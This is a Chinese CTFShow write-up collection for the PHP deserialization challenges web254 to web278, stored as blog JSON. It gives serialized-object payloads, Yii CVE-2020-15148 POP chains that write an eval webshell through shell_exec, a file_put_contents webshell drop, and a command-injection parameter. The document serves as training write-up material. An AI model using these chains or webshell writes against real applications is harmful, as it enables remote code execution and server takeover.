[{"data":1,"prerenderedAt":614},["ShallowReactive",2],{"content:\u002F2026\u002Fctfshow-web-php-writeup":3,"surround:\u002F2026\u002Fctfshow-web-php-writeup":608},{"id":4,"title":5,"body":6,"categories":585,"date":587,"description":588,"draft":589,"extension":590,"image":591,"meta":592,"navigation":594,"path":595,"permalink":596,"published":596,"readingTime":597,"recommend":596,"references":596,"seo":602,"sitemap":603,"stem":604,"tags":605,"type":606,"updated":587,"__hash__":607},"content\u002Fposts\u002F2026\u002FCTFShow Web入门 PHP反序列化 Writeup 合集.md","CTFShow Web入门 PHP反序列化 Writeup 合集",{"type":7,"value":8,"toc":556},"minimark",[9,13,22,32,35,38,57,67,74,76,79,90,96,103,105,108,127,133,140,142,145,156,162,169,171,174,177,179,182,185,192,194,197,213,220,226,232,238,245,247,250,253,261,268,270,273,280,282,285,292,297,304,306,309,315,321,328,330,333,343,349,356,358,361,372,378,387,393,400,406,413,415,418,421,427,434,436,439,442,449,451,454,456,463,465,468,470,472,475,477,479,482,484,486,489,491,493,496,520,528,535,537,540,542,544,547,549,551,554],[10,11,12],"h2",{"id":12},"web254",[14,15,16,17,21],"p",{},"简单的逻辑验证，只需要账号密码为 ",[18,19,20],"code",{"code":20},"xxxxxx"," 即可，直接用 GET 传参。",[14,23,24,28,29],{},[25,26,27],"strong",{},"flag",": ",[18,30,31],{"code":31},"ctfshow{0148479c-c0d7-410f-ad8d-09d1359f918d}",[33,34],"hr",{},[10,36,37],{"id":37},"web255",[14,39,40,41,44,45,48,49,52,53,56],{},"从 cookie 中获取 user，然后反序列化，再通过 ",[18,42,43],{"code":43},"login","、",[18,46,47],{"code":47},"checkVip"," 函数判断。只需生成一个 ",[18,50,51],{"code":51},"isVip"," 为 ",[18,54,55],{"code":55},"true"," 的对象序列化字符串。",[58,59,65],"pre",{"className":60,"code":62,"language":63,"meta":64},[61],"language-php","\u003C?php\nclass ctfShowUser{\n    public $isVip;\n    public $username='xxxxxx';\n    public $password='xxxxxx';\n}\n$a = new ctfShowUser();\n$a->isVip = true;\necho urlencode(serialize($a));\n?>\n","php","",[18,66,62],{"__ignoreMap":64},[14,68,69,28,71],{},[25,70,27],{},[18,72,73],{"code":73},"ctfshow{e6be0932-e4b6-4048-945e-439329770917}",[33,75],{},[10,77,78],{"id":78},"web256",[14,80,81,82,85,86,89],{},"在上一题的基础上加了一个判断，要求反序列化后的 ",[18,83,84],{"code":84},"username"," 和 ",[18,87,88],{"code":88},"password"," 不相等。",[58,91,94],{"className":92,"code":93,"language":63,"meta":64},[61],"\u003C?php\nclass ctfShowUser{\n    public $isVip;\n    public $username='xxxxxx';\n    public $password='xxxxx';\n}\n$a = new ctfShowUser();\n$a->isVip = true;\necho urlencode(serialize($a));\n?>\n",[18,95,93],{"__ignoreMap":64},[14,97,98,28,100],{},[25,99,27],{},[18,101,102],{"code":102},"ctfshow{cc7c465f-5f0a-4c41-acdb-8cfe5bd6ceab}",[33,104],{},[10,106,107],{"id":107},"web257",[14,109,110,111,114,115,118,119,122,123,126],{},"只需修改 ",[18,112,113],{"code":113},"class"," 值为 ",[18,116,117],{"code":117},"backDoor","，触发 ",[18,120,121],{"code":121},"__destruct"," 魔术方法，从而调用 ",[18,124,125],{"code":125},"getinfo"," 函数，进行 RCE。",[58,128,131],{"className":129,"code":130,"language":63,"meta":64},[61],"\u003C?php\nclass backDoor{\n    private $code=\"system('cat flag.php');\";\n\n}\nclass ctfShowUser\n{\n\n    private $class;\n    public function __construct(){\n        $this->class= new backDoor();\n    }\n}\n$c = new ctfShowUser();\necho urlencode(serialize($c));\n",[18,132,130],{"__ignoreMap":64},[14,134,135,28,137],{},[25,136,27],{},[18,138,139],{"code":139},"ctfshow{e33eafd5-3718-4e1c-abe4-2336cbdf8700}",[33,141],{},[10,143,144],{"id":144},"web258",[14,146,147,148,151,152,155],{},"在上一道基础上加了正则，可以用 ",[18,149,150],{"code":150},"O:+"," 绕过。注意这道题成员属性都是 ",[18,153,154],{"code":154},"public","。",[58,157,160],{"className":158,"code":159,"language":63,"meta":64},[61],"\u003C?php\nclass backDoor{\n    public $code=\"system('cat flag.php');\";\n}\nclass ctfShowUser\n{\n    public $class;\n    public function __construct(){\n        $this->class= new backDoor();\n    }\n}\n$c = new ctfShowUser();\n$a = serialize($c);\n$a=str_replace(\"O:\",\"O:+\",$a);\necho urlencode($a);\n",[18,161,159],{"__ignoreMap":64},[14,163,164,28,166],{},[25,165,27],{},[18,167,168],{"code":168},"ctfshow{9ce14fde-41cc-4301-8097-d78af496d7bc}",[33,170],{},[10,172,173],{"id":173},"web259",[14,175,176],{},"（暂无 wp）",[33,178],{},[10,180,181],{"id":181},"web260",[14,183,184],{},"不理解什么意义，直接传参。",[14,186,187,28,189],{},[25,188,27],{},[18,190,191],{"code":191},"ctfshow{61966581-87eb-49dd-b440-501855c26f7c}",[33,193],{},[10,195,196],{"id":196},"web261",[14,198,199,200,85,203,206,207,209,210,212],{},"如果类中同时定义了 ",[18,201,202],{"code":202},"__unserialize()",[18,204,205],{"code":205},"__wakeup()"," 两个魔术方法，则只有 ",[18,208,202],{"code":202}," 方法会生效，",[18,211,205],{"code":205}," 方法会被忽略。",[14,214,215,216,219],{},"利用 ",[18,217,218],{"code":218},"file_put_contents"," 函数。因为是弱比较，发现：",[58,221,224],{"className":222,"code":223,"language":63,"meta":64},[61],"\u003C?php\nvar_dump(0x36d == \"877.php\");  \u002F\u002F true\n?>\n",[18,225,223],{"__ignoreMap":64},[58,227,230],{"className":228,"code":229,"language":63,"meta":64},[61],"\u003C?php\nclass ctfshowvip{\n    public $username;\n    public $password;\n}\n$a = new ctfshowvip();\n$a->username = '877.php';\n$a->password = '\u003C?php eval($_GET[1]);?>';\necho urlencode(serialize($a));\n?>\n",[18,231,229],{"__ignoreMap":64},[14,233,234,235],{},"然后访问 ",[18,236,237],{"code":237},"877.php?1=system('cat \u002Fflag_is_here');",[14,239,240,28,242],{},[25,241,27],{},[18,243,244],{"code":244},"ctfshow{90103421-62cf-46f3-8519-7f3b8858da69}",[33,246],{},[10,248,249],{"id":249},"web262",[14,251,252],{},"字符串逃逸增多，逃逸了 27 个字符，只需 fuck 27 次。",[58,254,259],{"className":255,"code":257,"language":258},[256],"language-text","f=s&m=s&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:5:\"token\";s:5:\"admin\";}\n","text",[18,260,257],{"__ignoreMap":64},[14,262,263,28,265],{},[25,264,27],{},[18,266,267],{"code":267},"ctfshow{353f6df8-1fa5-47ba-ac90-5d09fbbc7f75}",[33,269],{},[10,271,272],{"id":272},"web263",[14,274,275,276,279],{},"访问 ",[18,277,278],{"code":278},"www.zip"," 获取源码。",[33,281],{},[10,283,284],{"id":284},"web264",[14,286,287,288,291],{},"和 web262 一样，用字符串逃逸，另外访问 ",[18,289,290],{"code":290},"message.php"," 时加上 cookie。",[58,293,295],{"className":294,"code":257,"language":258},[256],[18,296,257],{"__ignoreMap":64},[14,298,299,28,301],{},[25,300,27],{},[18,302,303],{"code":303},"ctfshow{e659f098-7102-4c3c-bf0f-11038cf02d99}",[33,305],{},[10,307,308],{"id":308},"web265",[14,310,311,312,155],{},"使用引用 ",[18,313,314],{"code":314},"&",[58,316,319],{"className":317,"code":318,"language":63,"meta":64},[61],"\u003C?php\nclass ctfshowAdmin{\n    public $token;\n    public $password;\n}\n$a = new ctfshowAdmin();\n$a->token = &$a->password;\necho urlencode(serialize($a));\n?>\n",[18,320,318],{"__ignoreMap":64},[14,322,323,28,325],{},[25,324,27],{},[18,326,327],{"code":327},"ctfshow{a4ad29b0-b250-414b-8e18-d5cbe006f69c}",[33,329],{},[10,331,332],{"id":332},"web266",[14,334,335,336,339,340,342],{},"需要构造一个 ",[18,337,338],{"code":338},"ctfshow"," 类触发 ",[18,341,121],{"code":121}," 魔术方法，输出 flag。通过大小写绕过正则。",[58,344,347],{"className":345,"code":346,"language":63,"meta":64},[61],"\u003C?php\nclass Ctfshow{\n}\n$a = new Ctfshow();\necho serialize($a);\n?>\n",[18,348,346],{"__ignoreMap":64},[14,350,351,28,353],{},[25,352,27],{},[18,354,355],{"code":355},"ctfshow{6479dadd-1745-491d-a222-7f46432c04a4}",[33,357],{},[10,359,360],{"id":360},"web267",[14,362,363,364,367,368,371],{},"查看源码发现是 Yii 框架，用 ",[18,365,366],{"code":366},"admin\u002Fadmin"," 登录，进入 about 页面，查看源码发现 ",[18,369,370],{"code":370},"\u003C!--?view-source -->"," 提示，用 GET 传参后出现：",[58,373,376],{"className":374,"code":375,"language":63,"meta":64},[61],"\u002F\u002F\u002Fbackdoor\u002Fshell\nunserialize(base64_decode($_GET['code']))\n",[18,377,375],{"__ignoreMap":64},[14,379,380,381,384,385,155],{},"根据 CVE-2020-15148，直接用已有的 POP 链打。这里的路由已经提示是 ",[18,382,383],{"code":383},"backdoor\u002Fshell","，所以直接传 ",[18,386,18],{"code":18},[58,388,391],{"className":389,"code":390,"language":63,"meta":64},[61],"\u003C?php\nnamespace yii\\rest{\n    class IndexAction\n    {\n        public $checkAccess;\n        public $id;\n        public function __construct(){\n            $this->checkAccess = 'phpinfo';\n            $this->id = '1';            \u002F\u002F命令执行\n        }\n    }\n}\nnamespace Faker {\n    use yii\\rest\\IndexAction;\n    class Generator\n    {\n        protected $formatters;\n        public function __construct()\n        {\n            $this->formatters['close'] = [new IndexAction(), 'run'];\n        }\n    }\n}\nnamespace yii\\db{\n    use Faker\\Generator;\n    class BatchQueryResult\n    {\n        private $_dataReader;\n        public function __construct()\n        {\n            $this->_dataReader=new Generator();\n        }\n    }\n}\nnamespace{\n    use yii\\db\\BatchQueryResult;\n    echo base64_encode(serialize(new BatchQueryResult()));\n}\n",[18,392,390],{"__ignoreMap":64},[14,394,395,396,399],{},"有的函数没回显，选择写入 shell，然后访问 ",[18,397,398],{"code":398},"1.php","，用 POST 传参即可。",[58,401,404],{"className":402,"code":403,"language":63,"meta":64},[61],"$this->checkAccess = 'shell_exec';\n$this->id = 'echo \"\u003C?php eval(\\$_POST[1]);phpinfo();?>\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fbasic\u002Fweb\u002F1.php';\n",[18,405,403],{"__ignoreMap":64},[14,407,408,28,410],{},[25,409,27],{},[18,411,412],{"code":412},"ctfshow{d0518711-8913-429e-8191-457e123ce63c}",[33,414],{},[10,416,417],{"id":417},"web268",[14,419,420],{},"上条被过滤了，换一条 POP 链。",[58,422,425],{"className":423,"code":424,"language":63,"meta":64},[61],"\u003C?php\nnamespace yii\\rest {\n    class Action\n    {\n        public $checkAccess;\n    }\n    class IndexAction\n    {\n        public function __construct($func, $param)\n        {\n            $this->checkAccess = $func;\n            $this->id = $param;\n        }\n    }\n}\nnamespace yii\\web {\n    abstract class MultiFieldSession\n    {\n        public $writeCallback;\n    }\n    class DbSession extends MultiFieldSession\n    {\n        public function __construct($func, $param)\n        {\n            $this->writeCallback = [new \\yii\\rest\\IndexAction($func, $param), \"run\"];\n        }\n    }\n}\nnamespace yii\\db {\n    use yii\\base\\BaseObject;\n    class BatchQueryResult\n    {\n        private $_dataReader;\n        public function __construct($func, $param)\n        {\n            $this->_dataReader = new \\yii\\web\\DbSession($func, $param);\n        }\n    }\n}\nnamespace {\n    $exp = new \\yii\\db\\BatchQueryResult('shell_exec', \"echo '\u003C?php eval(\\$_POST[1]);phpinfo();?>' > \u002Fvar\u002Fwww\u002Fhtml\u002Fbasic\u002Fweb\u002F1.php\");\n    echo(base64_encode(serialize($exp)));\n}\n",[18,426,424],{"__ignoreMap":64},[14,428,429,28,431],{},[25,430,27],{},[18,432,433],{"code":433},"ctfshow{9a563a63-37ae-4e9a-b2ba-8b5783a9a336}",[33,435],{},[10,437,438],{"id":438},"web269",[14,440,441],{},"268 的链子就能用。",[14,443,444,28,446],{},[25,445,27],{},[18,447,448],{"code":448},"ctfshow{bdb360ee-84cc-4495-aeef-d379ff1f113e}",[33,450],{},[10,452,453],{"id":453},"web270",[14,455,441],{},[14,457,458,28,460],{},[25,459,27],{},[18,461,462],{"code":462},"ctfshow{7a947d40-fed5-41e9-aec5-32a5b8cf2aff}",[33,464],{},[10,466,467],{"id":467},"web271",[14,469,176],{},[33,471],{},[10,473,474],{"id":474},"web272",[14,476,176],{},[33,478],{},[10,480,481],{"id":481},"web273",[14,483,176],{},[33,485],{},[10,487,488],{"id":488},"web274",[14,490,176],{},[33,492],{},[10,494,495],{"id":495},"web275",[14,497,498,499,52,502,504,505,508,509,512,513,516,517,155],{},"需要 ",[18,500,501],{"code":501},"checkevil()",[18,503,55],{"code":55},"，不进入 ",[18,506,507],{"code":507},"if"," 语句，利用 ",[18,510,511],{"code":511},"system"," 进行 RCE。再加一个 ",[18,514,515],{"code":515},";"," 隔断 ",[18,518,519],{"code":519},"rm",[14,521,522,28,525],{},[25,523,524],{},"payload",[18,526,527],{"code":527},"?fn=php;tac flag.php",[14,529,530,28,532],{},[25,531,27],{},[18,533,534],{"code":534},"ctfshow{bfb60e1a-c706-4c17-bfdc-516b1a7fad8c}",[33,536],{},[10,538,539],{"id":539},"web276",[14,541,176],{},[33,543],{},[10,545,546],{"id":546},"web277",[14,548,176],{},[33,550],{},[10,552,553],{"id":553},"web278",[14,555,176],{},{"title":64,"searchDepth":557,"depth":557,"links":558},4,[559,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584],{"id":12,"depth":560,"text":12},2,{"id":37,"depth":560,"text":37},{"id":78,"depth":560,"text":78},{"id":107,"depth":560,"text":107},{"id":144,"depth":560,"text":144},{"id":173,"depth":560,"text":173},{"id":181,"depth":560,"text":181},{"id":196,"depth":560,"text":196},{"id":249,"depth":560,"text":249},{"id":272,"depth":560,"text":272},{"id":284,"depth":560,"text":284},{"id":308,"depth":560,"text":308},{"id":332,"depth":560,"text":332},{"id":360,"depth":560,"text":360},{"id":417,"depth":560,"text":417},{"id":438,"depth":560,"text":438},{"id":453,"depth":560,"text":453},{"id":467,"depth":560,"text":467},{"id":474,"depth":560,"text":474},{"id":481,"depth":560,"text":481},{"id":488,"depth":560,"text":488},{"id":495,"depth":560,"text":495},{"id":539,"depth":560,"text":539},{"id":546,"depth":560,"text":546},{"id":553,"depth":560,"text":553},[586],"CTF","2026-06-16 08:59:34","整理自 web254 ~ web278",false,"md","\u002F2026\u002FCTFShow Web入门 PHP反序列化 Writeup 合集\u002Fcover.jpg",{"slots":593},{},true,"\u002F2026\u002Fctfshow-web-php-writeup",null,{"text":598,"minutes":599,"time":600,"words":601},"4 min read",3.81,228600,762,{"title":5,"description":588},{"loc":595},"posts\u002F2026\u002FCTFShow Web入门 PHP反序列化 Writeup 合集",[],"tech","Y5fURP0WcAI1Tc80b75D3HbfRMSSK3eZrpcDiM-B2IQ",[609,596],{"title":610,"path":611,"stem":612,"date":613,"type":606,"children":-1},"CVE-2020-15148 反序列化漏洞复现","\u002F2026\u002Fcve-2020-15148","posts\u002F2026\u002FCVE-2020-15148 反序列化漏洞复现","2026-06-15 19:01:17",1781603330216]